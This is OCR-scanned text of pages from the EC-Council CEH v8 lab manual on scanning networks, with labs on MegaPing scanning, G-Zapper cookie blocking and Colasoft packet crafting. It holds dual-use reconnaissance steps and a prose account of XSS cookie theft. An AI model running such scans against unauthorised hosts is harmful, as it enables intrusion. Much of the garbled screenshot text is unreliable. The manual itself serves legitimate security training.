£ 10.0.0.105 De«t._ g 10.0.0.104 D est — g 10.0.0.105 Dest P ie View T o o ls H elp 1 1 g f t A <> i , d r j ‫כ‬ L.st 1lo s ti ,p , D N S L o o k u p N a m e Q Finger a N e tw o rk T im e t l P in g T race rcu te HVhols 1“ 5 N e tw o rk R esources % rocess Info ^ S ystem Info N etBIO S S can n er y * Share Scanner $ S ecurity S co n ner l . J j ? Port Scanner J S i H o s t M o n ito r FIGURE 15.5: MegaPing IP Scanning Report 8. Select the NetBIOS Scanner from the left pane and type in the IP range in the From and To fields. 111this lab, the IP range is from 10.0.0.1 to 10.0.0.254 Click Start CD N etw ork utilities: DNS list host, DNS lookup name, Network Time Synchroni2er, Ping, Traceroute, Wliois, and Finger. S T A S K 2 NetBIOS Scanning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 238
Module 03 - Scanning Networks T I P If/egaPing (Unregistered)W File V ie w T o o ls H d p rP- A N c G C S S so n rcr J* | D N S L ist H o sts ,5,D N S L o o k u p N a m e g F in g er 3 NetworkTime t S P1n9 T race ro u te & W h o ls N e tw o rk R e s o u rc e <$> P ro c e ss Info 4 S ystem Info ^ IP S can n cr i! Share Scanner ^ S ecurity S can n er ^ P o rt S can n er H o s t M o n ito r NetBIOS Scanner FIGURE 15.6: MegaPing NetBIOS Scanning 9. The NetBIOS scan will list all the hosts with their NetBIOS nam es and adapter ad dresses MegaPing (Unregistered) M e V tfA T o ri? H elp JL JL 4S & *“88a & K«BIT$ Sc^rrer $ MenBIOS S ca rrra^ Net 9 0 $ Scan rer Stop10 0 . 0 .2 5 4 ‫י‬ Expard 1Names Expand Summary ] | 10 . 0 . 0 . 1 ||Rerg5 NstEJOS Scanner aJatLS‫־‬ Z o ro e e c Q uem g Net B O S Names on Stats Told. 131 A c tvc 3 =a!od 123 Report Name STctus 100.0.4 W IN -U L Y 8 3 3 K H Q .. A I v « » 2 ) N etBIO S N am es 3 Wgf A d o p ter A d d ress 00 15-5D 00-0 7 . . M ic ro s o ft ‫״‬ A D o m ain W O R K G R O U P iac.0.6 A D M IN • P C A Jiv c fr] N etBIO S N o m e : 6 W B A dapter A d d ress 00-15-50-00-07‫..־‬ M < ro s o ft ‫״‬ 4^ D o m a in W O R K G R O U P 100.0.7 W IN -D 3 9 M R S H L .. A lv # » j|] N etBIO S N am es 3 X f A d a p te r A d d ress D 4 -B E -D 9 -C 3 -C E .. JJ, D N S L ist H o sts j ! L D N S L o o k u p N a m• Q Finger !3 1N e tw o rk T im e t i p,n9 g*3 T race ro u te ^W hole -O N e tw o rk R esou rces %Process Info J ^ S ystem Info‫״‬‫״‬ ^IP S can n er $m g g n n 1 1?Share S can n er: S ecu rity S can n er y P o rt S can n er/‫״‬ 2 1H o s t M o n ito r NetBIO S S can n er FIGURE 15.7: MegaPing NetBIOS Scanning Report 10. Right-click the IP address. 111 this lab, the selected IP is 10.0.0.4; it will be different in your network. 11. Then, right-click and select the Traceroute option. ‫ס‬ MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more. &r Scan results can be saved in HTML or TXT reports, which can be used to secure your network ■‫־‬for exam ple, by shutting down unnecessary ports, closing shares, etc. 5 T A s K 3 Traceroute Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 239
Module 03 - Scanning Networks I I MMegaPing (Unregistered)v File View Tools H d p NctBICS S ca rre ‫־‬ NetBIOS Scanner S9<tngs Stdft0 254 Names Dcpand Summary $ M * 3 0 S Scarner Soeci: Rom: R ange v | 10 0 0 N e tE lO S S e in e r Satus Oroteted ?M addresses m M secs * b‫?׳‬ 3 0 ( jjNome Hoete Slate Total: 254 Actve 3 Failed251 ‫־‬ E xport T o File M e rg e H osts O p en Share V ie w H o t f ix D e ta b A p p ly H o t Fixes C o p y selected item C o p y selected ro w C o p y a ll result; S ave A s _____ B 0 B ■ * D N etBIO S f■ A d a p e e rA A C c m a in - j j 10.0.0.5 i - J | N etBIO S S ? A d o p te r A ^ C o m a in B A 10.0.0.7 £ NetBIG S ‫ף‬ ■3 A d o p te r A T racero ute ^ D N S L ist H o sts ; j , D N S L o o k u p N a m e g F in g er 3 N e tw o rk T im e t®* P in 9 A T race ro u te W h o ls N e tw o rk R esou rces P ro c e ss Info ^ S ystem Info •‫^־‬ IP S can n er ‫׳‬J^ N etBIO S S can n er Share Scanner S ecu rity S can n er ^ P o rt S can n er g l H o s t M o n ito r T ra cc ro u tc s th e se le ctio n FIGURE 15.8: MegaPing Traceroute 12. It will open the Traceroute window, and will trace die IP address selected. MegaPing (Unregistered) F ie V iew T o o ls H elp S. JL 4$ 151*« 88 Tracer0« * a a Traceroute S etth ot** □ Select Al □ R esolve I4an‫־‬s Destrebon: 1 0 0 0 .4 Z te straw n Jdrcs5 Jst Add D dctc Report | hoo Time Name Dstafc ‫י‬91>9 W IN -U L Y 8 S 8 K H C JIP [ 1 _ C o m p le te . 1 m £ 1 0 10.0.0.4 0 & '2 3 /1 2 1 0 t4 4 tf ‫־‬ A ' A D M I N PC [10.0.0.6] C o m p le te . * 4 1 10.0.0.6‫ו‬ 08/23/12 1 Q 4 S J1 J j , D N S L ist H o> b J!L D N S L o o k u p N a m e | J Finger i l l N e tw o rk T im e ^ W h ols - O N e tw o rk R esou rces *■{?> Process Info S ystem Info ■^ IP S can n er N etBIO S S can n er *jp Share S ca n n e i S ecu rity S can n er ‫>׳‬y P o rt Scanner jtA H o» t M o n ito r FIGURE 15.9: MegaPing Traceroute Report 13. Select Port Scanner from die left pane and add w w w .certifiedhacker.com 111 the Destination Address List and then click the Start button. 14. After clicking the Start button it toggles to Stop 15. It will lists the ports associated with www.certifiedl1acker.com with die keyword, risk, and port number. ‫ם‬ Other features include multithreaded design that allows to process any number of requests in any tool at the same time, real- time network connections status and protocols statistics, real-time process information and usage, real-time network information, including network connections, and open network files, system tray support, and more & Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S T A s K 4 Port Scanning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 240
Module 03 - Scanning Networks ‫ן‬v‫ך‬ - ‫י‬ ‫״‬ ‫ז‬ MegaPing (Unregistered) File View Tools Help A A £ GJ 8s 8s <5 J ' b & r H I J & GO J‫!׳‬ jftjf F01 Sc*1r* ‫׳‬^ AotScamcr Pnxowte TCP an: UCP m m <‫»־‬V**tv30‫׳‬ fl‫׳<»־׳‬n Scan Type A /!h »»S Pab -11 S100 Deslnrtor A i^ n t Ua> □ S*t*dAl w»!* | 2or* Type Keyword Os8cr»on R * = S Scanning—(51 %) 3 C e2 fc 99 Sccon ds Remain ‫ח‬g TCP ftp File Transfer [Control] Eksatcd TCP www-http World V.'ide Web HTTP Elevated ,y 1 UDP tcpmux TCP Port Servkc MultL. E le.xed ‫*״‬J. UOP compress.. M anagement Utility L<*m .y! UOP com p ten . CompreiMoo P roem Law . * 5 UOP rje Remote Job Entry Low UOP echo Echo Low y * UOP ditcntd Discard Law ' • - j j, DNS List Hosts ,5 , DNS Lookup Nam e Finger 5 4 Network Time f t Ping g g Traceroute ^Whois N etwoik Resources - ^ Pick m Info System Info ^ IP Sc«nn«< -jjj’ NetBIOS Sc *nn*i Share Seanner j P S*u n ty Scanner j/ J 4 H 05‫ז‬ Monitor FIGURE 15.10: MegaPing Port Scanning Report Lab Analysis Document all die IP addresses, open ports and running applications, and protocols you discovered during die lab. Tool/Utility Information Collected/Objectives Achieved M egaPing IP Scan Range: 10.0.0.1 —10.0.0.254 Perform ed Actions: ■ IP Scanning ■ NetBIOS Scanning ■ Traceroute ■ Port Scanning Result: ■ List of Active Host ■ NetBios Name ■ Adapter Name MegaPing security scanner checks your network for potential vulnerabilities that might use to attack your network, and saves information in security reports Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 241
Module 03 - Scanning Networks P L E A SE TALK TO YOUR I N S T R U C T O R IF YOU H A VE Q U E S T I O N S R E L A T E D T O T H I S LAB. Questions 1. How does MegaPing detect security vulnerabilities on die network? 2. Examine the report generation of MegaPing. Internet Connection Required 0 Noes□ Y Platform Supported 0 iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 242
Module 03 - Scanning Networks Lab Detect, Delete and Block Google Cookies Using G-Zapper G-Zapperis a utility to block Goog/e cookies, dean Goog/ecookies, andhelpyon stay anonymousnhile searchingonline. Lab Scenario You have learned in die previous lab diat MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. It provides detailed information about all computers and network appliances. It scans your entire network and provides information such as open shared resources, open ports, services/drivers active 011 the computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML 01‫־‬ TXT reports, which can be used to secure your network. As an administrator, you can organize safety measures by shutting down unnecessary ports, closing shares, etc. to block attackers from intruding the network. As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history. Lab Objectives This lab explain how G-Zapper automatically d etects and clean s the Google cookie each time you use your web browser. Lab Environment To carry out the lab, vou need: I C O N K E Y Valuable information Test your knowledge m. Web exercise o Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 243
Module 03 - Scanning Networks G-Zapper is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksAnonymizersG-Zapper You can also download die latest version of G‫־‬Zapper from the link littp://www.dummysoftware.com/ If you decide to download the latest version, then screenshots shown in the lab might differ Install G-Zapper 111 Windows Server 2012 by following wizard driven installation steps Administrative privileges to run tools A computer running W indows Server 2012 Lab Duration Time: 10 Minutes Overview of G-Zapper G-Zapper helps protect your identity and search history. G-Zapper will read die Google cookie installed on your PC, display die date it was installed, determine how long your searches have been tracked, and display your Google searches. G- Zapper allows you to automatically delete or entirely block die Google search cookie from future installation. Lab Tasks S t a s k 1 1 . Launch the Start menu by hovering die mouse cursor on the lower-left Detect & Delete comer of the desktop.____________________________________ Google Cookies FIGURE 16.1: Windows Server 2012 - Desktop view 2. Click die G-Zapper app to open die G‫־‬Zapper window. !3 WindowsServe!2012 * ttcua Stfwr JOtJ ReleaseCmadtte Oatacert* ftabslanuwy. 1uMM>: S ’ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 244
Module 03 - Scanning Networks Administrator £ G-Zapper Start Server Manager Wruiows PowerShel 6009* Chrome H-jpw-V Manager Ancrym.. Surfog Tutonal fLm V # 11 □ Computer Control P w l ItyperV Virtual M «tw w SOL S e na w Q Command Prompt M v <1 l.retox ‫י‬ n $ 51 Ns’tSca'iT... Pro Demo Standard M a w T* 11 FIGURE 162: Windows Server2012- Apps 3. The G-Zapper main window will appear as shown in die following screenshot. G-Zapper ‫־‬ TRIAL VERSION What is G-Zapper G-Zapper -Protectingyou Search Privacy Didyou know •Google stores a unique identifier in a cookie onyour PC, vrfich alows them to track the keywords you search for. G-Zapper w i automatically detect and clean this cookie inyour web browser. Just run G-Zapper, mrwnee the wndow, and en!oyyour enhanced search privacy 2' I A Google Tracking ID oasts on your PC. Your Google ID (Chrome) 6b4b4d9fe5c60cc1 Google nstaled the cookie on Wednesday. September 05.2012 01 54 46 AM Your searches have been tracked for 13 hours «>| No Google searches found n Internet Explorer or Frefox How to Use It « To delete the Google cookie, dck the Delete Cookie button Your identity w i be obscuredfromprevious searches and G-Zapper w i regiiariy dean future cookies. T0 restore the Google search cookie dick the Restore Cookie button htto //www dummvsoftware.com RegisterSettingsTest GoogleRestore CookieDelete Cookie FIGURE 16.3: G-Zapper main windows 4. To delete the Google search cookies, click the D elete Cookie button; a window will appear that gives information about the deleted cookie location. Click OK m G-Zapper xs compatible with Windows 95,98, ME, NT, 2000, XP, Vista, Windows 7. LJ G-Zapper helps protect your identity and search history. G-Zapper will read the Google cookie installed on your PC, display the date it was installed, determine how long your searches have been tracked, and display your Google searches Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 245
■ ] jlF x ‫י‬‫י‬ G-Zapper - TRIAL VERSION Module 03 - Scanning Networks What is G-Zapper G-Zapper ‫־‬Protectng your Search Privacy Didyou know ■Google stores a unique identifier n a cookie on you PC, v*»ch alows them 10 track the keywordsyou search for G-Zapper w i automatically defect and dean this cookie inyour web browser. -J 1 1 sL (1 jn -fi-7 a n n ftt th e , w n d n w * i n i ftn in u .u n u i ^ n h a o c a d n c iY ^ u _________ _________ G‫־‬Zapper The Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com The cookie was located at (Firefox) C:UsersAdministratorApplication DataMozillaFirefoxProfiles5vcc40ns.defaultcookies.sqlite © OK T0 block and delete the Google search cookie, click the Block Cookie button (Gmail andAdsense w i be unavaJable with the cookie blocked) http //www.dummvsoftware com ■# Howt RegisterSettingsTest GoogleBlock CookieDelete Cookie C] A new cookie will be generated upon your next visit to Google, breaking the chain that relates your searches. FIGURE 16.4: Deleting search cookies 5. To block the Google search cookie, click die Block cookie button. A window will appear asking if you want to manually block the Google cookie. Click Yes ' - mG‫־‬Zapper - TRIAL VERSION What is G-Zapper G-Zapper -Protectngyou Search Privacy Didyou know -Google stores a unique identifier ina cookie onyour PC. which alows them to track the keywordsyou search for. G-Zapper will automatically detect and dean this cookie inyou web browser. p__ .LMiijnfi-Zanrret mrnnnrethe,wnrinw andpjiinu.unu..ftnhanrarisftatnhnrtwra______ _____ Manually Blocking the Google Cookie Gmail and other Google services will be unavailable while the cookie is manually blocked. If you use these services, we recommend not blocking the cookie and instead allow G-Zapper to regularly clean the cookie automatically. Are you sure you wish to manually block the Google cookie? NoYes How T0 block and delete the Google search cookie, click the Block Cookie bUton (Gmail andAdsense w l be unavaiaWe with the cookie blocked) http //www dummvsoftware,com RegisterSettingsTest GoogleBlock CookieDelete Cookie FIGURE 16.5: Block Google cookie 6. It will show a message diat the Google cookie has been blocked. To verify, click OK ‫ס‬ The tiny tray icon runs in the background, takes up very little sp ace and can notify you by sound & animate when the Google cookie is blocked. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 246
Module 03 - Scanning Networks G‫־‬Zapper - TRIAL VERSION What isG-Zapper G-Zappef -Protecbngyour Search Privacy Didyou know ■Google stores a unique identtfier in a cookie onyour PC. which alows themto track the 1 ^ 0 keywordsyou search for GZapper will automatically detect and dean this cookie n you web browser. Just run GZapper, mmmize the wrxlow. and enjoyyour enhanced search privacy G‫־‬Zapper The Google cookie has been blocked. You may now search anonymously on google.com. Click the Test Google button to verify. OK Your identity will be obscured fromprevious searches and G-Zapper w i regularly clean future cookies T0 restore the Google search cookie clck the Restore Cookie button http //www dummvsoftware com How t RegtsterSettingsTest GoogleRestore CookieDelete Cookie FIGURE 16.6: Block Google cookie (2) 7. To test the Google cookie that has been blocked, click the T est Google button. 8. Yoiu default web browser will now open to Google’s Preferences page. Click OK. AAgoog... P - 2 (5 [ 0 ?references ‫יו‬ - ♦You Search Images Maps Play YouTube News Gmal More ‫־‬ Sign in 1 GoflfllsAccount 5£tt303 Piefeiences Help IAbout Google Save Preferences PreferencesGoogle S a v e your p r e fe rv n cv » w h e n fin ish e d a n d !* tu r n t o i w r c h Global Preferences (changocapplyto al Googio sorvtcos) Y o u r c o o k ie s se em to be disabled. Setting preferences will not work until you enable cookies in your browser. Interface Language Display GoogioTipsand messages in: Engiisn ttyou do not findyour native language in the pulldown above you can help Google create itthroughour Google in Your Ianfliiage program Piefei pages mitten inthese language(*) □ Afrikaans b£English U Indonesian LI Serbian □ Arabic L. Esperanto U Italian □ Slovak D Armenian I~ Estonian FI Japanese 0 Slovenian □ Belarusian CFlipino □ Koiean G Spanish U Bulgarian L Finnish U Latvian LI Swahi Search Ianguage FIGURE 16.7: Cookies disabled massage 9. To view the deleted cookie information, click die Setting button, and click View Log in the cleaned cookies log . & ‫־‬ G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for som eone using your PC to get a glimpse of what you've been searching for. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 247
Module 03 - Scanning Networks ‫׳‬ - mG‫־‬Zapper - TRIAL VERSION What is G-Zapper G‫־‬Zapper Settings Sounds Preview Browsef* Ray sound effect when a cookie is deleted defaultwav GoogleAnalytics Trackng W Block GoogleAnalytics fiom tiackng web sites that I visit. View Log Deaned Cookies Log Clear LogW Enable logging of cookies that have recently been cleaned. I” Save my Google ID in the deaned cookies log. OK RegisterSettingsRestore Cookie Test GoogleDelete Cookie Q You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy FIGURE 16.8: Viewingthe deleted logs 10. The deleted cookies information opens in Notepad. cookiescleaned - Notepad t ‫ם‬[‫־־‬ x File Edit Format View Help (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Friday, August 31, 2012 10:42:13 AM (Chrome) C :UsersAdministratorAppDataLocalGoogleChromeUser Data DefaultCookies Friday, August 31, 2012 11:04:20 AM (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Friday, August 31, 2012 11:06:23 AM (Firefox) C :UsersAdministratorApplication DataMozillaFirefox Profiles5vcc40ns.defaultcookies.sqlite Wednesday, September 05, 2012 02:52:38 PM| S ' Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks FIGURE 16.9: Deleted logs Report Lab Analysis Document all the IP addresses, open ports and running applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 248
Module 03 - Scanning Networks Tool/Utility Information Collected/Objectives Achieved G‫־‬Zapper Action Performed: ■ Detect die cookies ■ Delete the cookies ■ Block the cookies Result: Deleted cookies are stored in C:UsersAdministratorApplication Data P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine how G-Zapper automatically cleans Google cookies. 2. Check to see if G-zappei is blocking cookies on sites other than Google. Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 249
Module 03 - Scanning Networks Lab Scanning the Network Using the Colasoft Packet Builder The ColasoftPacketBuilderis a usefultoolfor creatingcustom nehrorkpackets. Lab Scenario 111 die previous lab you have learned how you can detect, delete, and block cookies. Attackers exploit die XSS vulnerability, which involves an attacker pushing malicious JavaScript code into a web application. When anodier user visits a page widi diat malicious code in it, die user’s browser will execute die code. The browser lias 110 way of telling the difference between legitimate and malicious code. Injected code is anodier mechanism diat an attacker can use for session liijacking: by default cookies stored by the browser can be read byJavaScript code. The injected code can read a user’s cookies and transmit diose cookies to die attacker. As an expert ethical hacker and penetration tester you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields, encoding input and output and filter meta characters in the input and using a web application firewall to block the execution of malicious script. Anodier method of vulnerability checking is to scan a network using the Colasoft Packet Builder. 111 this lab, you will be learn about sniffing network packets, performing ARP poisoning, spoofing the network, and DNS poisoning. Lab O bjectives The objective of diis lab is to reinforce concepts of network security policy, policy enforcement, and policy audits. Lab Environm ent 111 diis lab, you need: ■ Colasoft Packet Builder located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksCustom Packet CreatorColasoft Packet Builder ■ A computer running Windows Server 2012 as host machine I C O N K E Y Valuable information Test vour knowledge Q W eb exercise Q W orkbook review ^TTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 250
Module 03 - Scanning Networks ■ Window 8 running on virtual machine as target machine ■ You can also download die latest version of Advanced Colasoft Packet Builder from die link http:// www.colasoft.com/download/products/download_packet_builder. php ■ If you decide to download die latest version, dien screenshots shown in die lab might differ. ■ A web browser widi Internet connection nuuiing in host macliine Lab Duration Time: 10 Minutes O verview of Colasoft Packet Builder Colasoft Packet Builder creates and enables custom network packets. This tool can be used to verify network protection against attacks and intmders. Colasoft Packet Builder features a decoding editor allowing users to edit specific protocol field values much easier. Users are also able to edit decoding infonnation in two editors: Decode Editor and Hex Editor. Users can select any one of die provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet. Lab Tasks 1. Install and launch die Colasoft Packet Builder. 2. Launch the Start menu by hovering die mouse cursor on the lower-left corner of the desktop. S t a s k 1 Scanning Network FIGURE 17.1:Windows Server2012- Desktop view 3. Click the C olasoft Packet Builder 1.0 app to open the Colasoft Q y <“ You can download Packer Builder window Colasoft Packet Builder from http:/ /www.colasoft.com. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 251
Module 03 - Scanning Networks Administrator Start S em * Windows PowerSN>ll Googte Chrome S»#Th C otaoft Packpt Bunder t.O ik m * * * computer control 1'anrt ManagM v M ochn#. *J V 91 9 e Command Prompt SQL J*rv*‫׳‬ Irn-.aljt 0 ‫י־‬ Center. MfrtjpaC* Studc ter V 3 s- e . MeuMa r»efax Nnwp 7«ftmap GUI CMtoo $ o FIGURE 17.2Windows Server2012- Apps 4. Tlie Colasoft Packet Builder main window appears. Colasoft Packet Builder ‫־‬ ‫־‬ ‫ך‬1=-1 Fie Edt Send Help ! # ^ 1 Import S?’ & 1 Add Insert ♦ Checksum [ A s ^ J 55 Adapter C o laso ft 4 $ Oecode Editor Packet No. No p x k e c elected: $ Packet Lilt Packets 0 Selected 0 1 Delta Time Sourer fatal 0 byte* | <L FIGURE 17.3: ColasoftPacket Buildermain screen ^ He«Edfcor >0:0 5. Before starting of vonr task, check diat die Adapter settings are set to default and dien click OK. Operating system requirements: Windows Server 2003 and 64-bit Edition Windows 2008 and 64-bit Edition Windows 7 and 64-bit Edition *Select Adapter ‫י‬ ? -iF.WlT.rtf&TaTi.FiAdapter: D4:BE:D9:C3:CE:2D0 100.0 l*)ps 1500 bytes 10.0.0.7/255.255.255.0 10.0.0.1 Operational Physical Address Link Speed Max Frame Size IP Address Default Gateway Adapter Status HelpCancelOK FIGURE 17.4: Colasoft PacketBuilderAdapter settings Ethical H acking and Counterm easures Copyright <0by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 252
Module 03 - Scanning Networks 6. To add 01 create die packet, click Add 111 die menu section. File Edit Send Help 0 0 1 Import Export‫־‬‫״‬‫־‬ Add Insert [ ^ Decode Editor FIGURE 17.5: ColasoftPacket Buildercreatingdie packet 7. When an Add Packet dialog box pops up, you need to select die template and click OK. ‫־‬n nAdd Packet ARP Packet Second0.1 Select Template: Delta Time: HelpCancelOK There are two ways to create a packet - Add and Insert. The difference between these is the newly added packet's position in the Packet List. The new packet is listed as the last packet in the list if added but after the current packet if inserted. £ 2 Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and*cpf (Capsa 4.0 Packet File) format. You may also import data from ‫״‬.cap (Network Associates Sniffer packet files), *.pkt (EtherPeekv7/TokenPeek/ A1roPeekv9/OmniPeekv9 packet files), *.dmp (TCP DUMP), and *rawpkt (raw packet files). FIGURE 17.6: Cohsoft Packet BuilderAdd Packet dialogbox 8. You can view die added packets list 011 your right-hand side of your window. S T A s K 2 Decode Editor 9. Colasoft Packet Builder allows you to edit die decoding information in die two editors: Decode Editor and Hex Editor. Packet List Packets 1 Selected 1 _____Usl____DeltaTims . Source Destination______, 1 0.100000 00:00:00:00:00:00 FIGURE 17.7:Colasoft Packet BuilderPacket List Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 253
Module 03 - Scanning Networks Decode Editor P ack et: Num:000001 L e n g th :64 C aptured:• B -© E th e rn e t Type I I [0/14] le s t i n a t i o n A d d ress: FF: FF: FF: FF: FF: FF [0/6] J © Source A ddress: 00:0 0 :0 0 :0 0 :0 0 :0 0 [6/6] j ! ^ P r o t o c o l : 0x0806 (ARP) [12. - sj ARP - A ddress R e so lu tio n P ro to c o l [14/28] !••••<#>Hardware ty p e : 1 (E th e rn e t) :P ro to c o l Type‫ץ‬#(! 0x0800 [16/2] j...© Hardware A ddress L ength: 6 [18/1] ‫©...ן‬ P ro to c o l A ddress L ength: 4 [19/1] ! |—<#1ype: 1 (ARP Reque. -^J>S0 u rc e P h y sics: 00:0 0 :0 0 :0 0 :0 0 :0 0 [22/6] j3 ‫״‬ Source IP : 0 .0 .0 .0 [28/4] D e s tin a tio n P h y sics: 00:0 0 :0 0 :0 0 :0 0 :0 0 [32/6] j D e s tin a tio n IP : 0 .0 .0 .0 [38/4] - •© E x tra D ata: [42/18] Number o f B y tes: FCS: 18 b y te s [42/18] L # FCS: 0xF577BDD9 , < L 111 j ......; ..... ,....‫־‬... ‫>״‬ J Q B u s t Mode Option: If you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option. FIGURE 17.8: Cohsoft PacketBuilderDecode Editor ^ Hex Editor Total 60 bytes 0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06 000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00 001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 002A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0038 00 00 00 00 . . . . V FIGURE 17.9:ColasoftPacketBuilderHexEditor 10. To send all packets at one time, click Send Allfrom die menu bar. 11. Check die Burst Mode option in die Send All Packets dialog window, and dien click Start. ‫ר‬ Colasoft Capsa Packet Analyzer ^4 Send AllSendChecksumJown 1 Packet List Packets 1 Selected 1 No. Delta Time Source Destination 1 0.100000 00:00:00:00:00:00 FF:FF:FF:FF:FF:FF .^O ption, Loop Sending: This defines the repeated times of the sending execution, one time in default. Please enter zero if you want to keep sending packets until you pause or stop it manually. FIGURE 17.10: Colasoft Packet Builder SendAll button Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 254
Module 03 - Scanning Networks £ 3 Select a packet from the packet listing to activate Send All button FIGURE 17.11: Colasoft Packet BuilderSendAHPackets 12. Click Start Send All Packets Select... loops (zero for infinite loop) milliseconds Options Adapter: Realtek PCIe G8E Famrfy Controller □ Burst Mode (no delay between packets) □ Loop Sendng: 1 A - 1000 A -Delay Between Loops: 1000 Sending Information Total Packets: 1 Packets Sent: 1 Progress: HelpCloseStopStart £0T he progress bar presents an overview of the sending process you are engaged in at the moment. FIGURE 17.12 ColasoftPacket BuilderSendAHPackets 13. To export die packets sent from die File menu, select File‫^־‬Export‫^־‬All Packets. Ethical H acking and Counterm easures Copyright <0by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 255
Module 03 - Scanning Networks ‫י‬ L? ‫ר״‬ Colas File Edit Send Help Import... 1 * 0 1 ‫׳‬ a X 1 0 Export ► All Packets... glete Exit ^ Selected Packets... ketNo. |_jJ I +^ T Packet: Num: 00( EJ-@ E th e rn e t Type I I ^ D e s t i n a t i o n A ddress: Source A ddress: ‫ן‬[0 /1 4] FF: FF:1 00:00:( , FIGURE 17.13: ExportAllPacketspotion Save As x I 5avein‫־‬ ! " ! : o la e c - f t flfcl Nome D«tc modified Type No items match your search. Rcccnt plocca ■ Desktop < 3 Libraries lA f f Computer Network r n ______ ... r>1 F1Un»m* | Fjiekct•e«cpld v j Sav• S»v• •c typ♦ (Colafloft Packot Rio (v6)(*.oocpkt) v | C«rc«l | FIGURE 17.14: Selectalocationto save the exported file U Packets.cscpkt FIGURE 17.15: ColasoftPacket Builderexportingpacket Lab Analysis Analyze and document die results related to the lab exercise. Tool/Utility Information Collected/Objectives Achieved Colasoft Packet Builder Adapter Used: Realtek PCIe Family Controller Selected Packet Name: ARP Packets Result: Captured packets are saved in packets.cscpkt Q Option, Packets Sent This shows the number of packets sent successfully. Colasoft Packet Builder displays the packets sent unsuccessfully, too, if there is a packet not sent out. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 256
Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network. 2. Evaluate what types of instant messages Capsa monitors. 3. Determine whether die packet buffer affects performance. If yes, dien what steps do you take to avoid or reduce its effect on software? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 257
